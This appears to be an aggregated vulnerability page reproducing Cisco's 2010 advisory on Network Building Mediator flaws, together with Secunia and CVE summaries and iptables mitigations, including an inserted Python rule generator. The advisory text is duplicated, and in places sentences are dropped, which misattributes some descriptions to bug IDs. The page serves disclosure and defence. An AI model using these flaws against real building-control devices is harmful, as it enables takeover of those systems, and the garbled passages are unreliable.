protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0597. Additionally, this
vulnerability can be exploited to reload the affected device. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 ( registered customers only) has been assigned CVE
identifier CVE-2010-0598.
* CSCtb83505 ( registered customers only) has been assigned CVE
identifier CVE-2010-0599.
* CSCtb83512 ( registered customers only) has been assigned CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to the HTTP protocol. There is no workaround for the
vulnerability that affects the XML RPC service. The HTTPS service is
enabled and running by default and no further action is needed to
enable it. The HTTP service can be disabled with configTOOL: in the
Node tree pane, expand the services tab, then expand the network tab,
click the http_server tab, and uncheck Enabled.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. Exposure can, however,
be reduced by restricting network access to the device to the
designated operator consoles with the iptables rules below. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
commands must be entered on the serial console. Please refer to
section 2.4 in the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
HyperTerminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules from the above example, care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. With a DROP policy on the INPUT
chain this also covers replies to connections the Mediator itself
initiates, unless a rule accepting established connections is added.
Failure to do so will break connectivity to these sensors and devices.
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2010-May-26 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
----------------------------------------------------------------------
Stay Compliant
Alerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions
Free Trial
http://secunia.com/products/corporate/evm/trial/
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DISCUSS ADVISORY:
http://secunia.com/advisories/39904/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/39904/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g. credentials) is passed via
HTTP and XML-RPC over HTTP and may, therefore, be intercepted by a
third party.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201005-0901 | CVE-2010-0598 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 does not encrypt HTTP sessions from operator workstations, which allows remote attackers to discover Administrator credentials by sniffing the network, aka Bug ID CSCtb83631. Cisco Network Building Mediator (NBM) products are affected by multiple vulnerabilities that could allow an attacker to gain control of a vulnerable device or to cause a denial of service. This problem is tracked as Bug ID CSCtb83631. A third party who intercepts network traffic may be able to obtain administrator credentials. The Cisco Network Building Mediator is a smart, interconnected building solution that intelligently interconnects and operates heating, ventilation and cooling systems (HVAC), lighting, power, security, and renewable energy systems over IP networks. Cisco Network Building Mediator contains several security vulnerabilities:
- Default authentication credentials (CVE-2010-0595): several predefined user accounts on the device, including the administrator account, use default credentials, so any user with network access to the device can log in to the control system as an administrator.
- Privilege escalation (CVE-2010-0596, CVE-2010-0597): these vulnerabilities allow unauthorized users to read and modify the device configuration. The attacker must authenticate successfully but does not need administrator privileges, and can read or modify the device configuration without knowing the administrator's credentials. Both vulnerabilities are exploited over HTTP or HTTPS. In addition, Cisco bug ID CSCtb83618 (CVE-2010-0597) can be used to reload the device; repeated exploitation results in a denial of service.
- Unauthorized information interception (CVE-2010-0598, CVE-2010-0599): CVE-2010-0598 allows a malicious user who intercepts HTTP sessions to obtain administrator credentials, and CVE-2010-0599 allows a malicious user who intercepts XML RPC sessions to obtain administrator credentials.
- Unauthorized information access (CVE-2010-0600): a malicious user can read system configuration files, which contain user account information including passwords. The attack is carried out over XML RPC or XML RPC over HTTPS.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks and possibly a full compromise of the affected device.
This issue is tracked by Cisco Bug ID CSCtb83631. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 (registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 (registered customers only) has been assigned the CVE
identifier CVE-2010-0596.
This vulnerability could enable any authenticated user to read and
modify the device configuration.
* CSCtb83618 (registered customers only) has been assigned the CVE
identifier CVE-2010-0597. This vulnerability can additionally be
exploited to reload the affected device.
HTTP and XML RPC sessions between an operator workstation and the
device are not encrypted. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 (registered customers only) has been assigned the CVE
identifier CVE-2010-0598.
* CSCtb83505 (registered customers only) has been assigned the CVE
identifier CVE-2010-0599.
* CSCtb83512 (registered customers only) has been assigned the CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to the HTTP protocol. There is no workaround for the
vulnerability that affects the XML RPC service. The HTTPS service is
enabled and running by default and no further action is needed to
enable it. The HTTP service can be disabled with configTOOL: in the
Node tree pane, expand the services tab, then expand the network tab,
click the http_server tab, and uncheck Enabled.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. Exposure can, however,
be reduced by restricting network access to the device to the
designated operator consoles with the iptables rules below. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
commands must be entered on the serial console. Please refer to
section 2.4 in the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
HyperTerminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules from the above example, care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. With a DROP policy on the INPUT
chain this also covers replies to connections the Mediator itself
initiates, unless a rule accepting established connections is added.
Failure to do so will break connectivity to these sensors and devices.
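The iptables workaround above (here and in the preceding entry) is typed one rule at a time, and the advisory leaves the sensor allow rules to the operator. The following generator is an added example, not Cisco's code or part of the advisory: it builds the same default-deny INPUT policy as an iptables-restore file that can be reviewed before being applied in one step, adds the loopback and established-connection rules that keep the Mediator's own outbound traffic working, and refuses a malformed console address rather than emitting a ruleset that locks every console out. It assumes the device's iptables has the `state` match and an `iptables-restore` binary; the sensor subnet, protocol and port in the demo are hypothetical placeholders.

```python
"""Added example (not part of the Cisco advisory): build the advisory's
iptables workaround as an iptables-restore file that can be reviewed and
then applied atomically, instead of typing rules one at a time.

Assumptions: the device's iptables supports the `state` match and provides
`iptables-restore`; the sensor allow-list entries are hypothetical
placeholders for the site's real sensor subnets, protocols and ports."""
import ipaddress


def nbm_ruleset(consoles, sensor_allows=()):
    """Return iptables-restore text for the filter table.

    consoles      -- IPv4 addresses of operator consoles (full access)
    sensor_allows -- (network, proto, port) tuples for devices that open
                     connections *to* the Mediator; proto is "tcp" or "udp"

    Rule order matters: loopback and reply traffic are accepted before the
    per-console rules, and the INPUT policy is DROP, as in the advisory.
    A malformed address or unsupported protocol raises ValueError so a typo
    cannot silently produce a ruleset that cuts off every console.
    """
    if not consoles:
        raise ValueError("at least one operator console is required")
    lines = [
        "*filter",
        ":INPUT DROP [0:0]",          # default-deny inbound, as the advisory does
        ":FORWARD ACCEPT [0:0]",
        ":OUTPUT ACCEPT [0:0]",
        "-A INPUT -i lo -j ACCEPT",   # local services talking to themselves
        # replies to connections the Mediator itself opens (sensor polling etc.)
        "-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT",
    ]
    for console in consoles:
        addr = ipaddress.IPv4Address(console)   # raises ValueError if malformed
        lines.append(f"-A INPUT -s {addr}/32 -j ACCEPT")
    for net, proto, port in sensor_allows:
        net = ipaddress.IPv4Network(net)        # raises ValueError if malformed
        if proto not in ("tcp", "udp"):
            raise ValueError(f"unsupported protocol {proto!r}")
        lines.append(f"-A INPUT -s {net} -p {proto} --dport {int(port)} -j ACCEPT")
    lines.append("COMMIT")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # The advisory's two documentation addresses as consoles, plus one
    # hypothetical sensor subnet speaking BACnet/IP (UDP 47808); replace
    # with the real addresses before applying with `iptables-restore`.
    print(nbm_ruleset(["192.0.2.1", "192.0.2.2"],
                      [("10.10.0.0/24", "udp", 47808)]), end="")
```

Save the output to a file, review it, and load it with `iptables-restore < file` from the serial console so a mistake cannot cut off the session used to fix it. Rules loaded this way live in the kernel only; on a typical Linux system they do not survive a reboot unless the platform's startup scripts restore them, and the advisory does not say whether the Mediator does so, so check after the next reboot.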
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2010-May-26 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g. credentials) is passed via
HTTP and XML-RPC over HTTP and may, therefore, be intercepted by a
third party.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
----------------------------------------------------------------------
VAR-201005-0069 | CVE-2010-0600 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
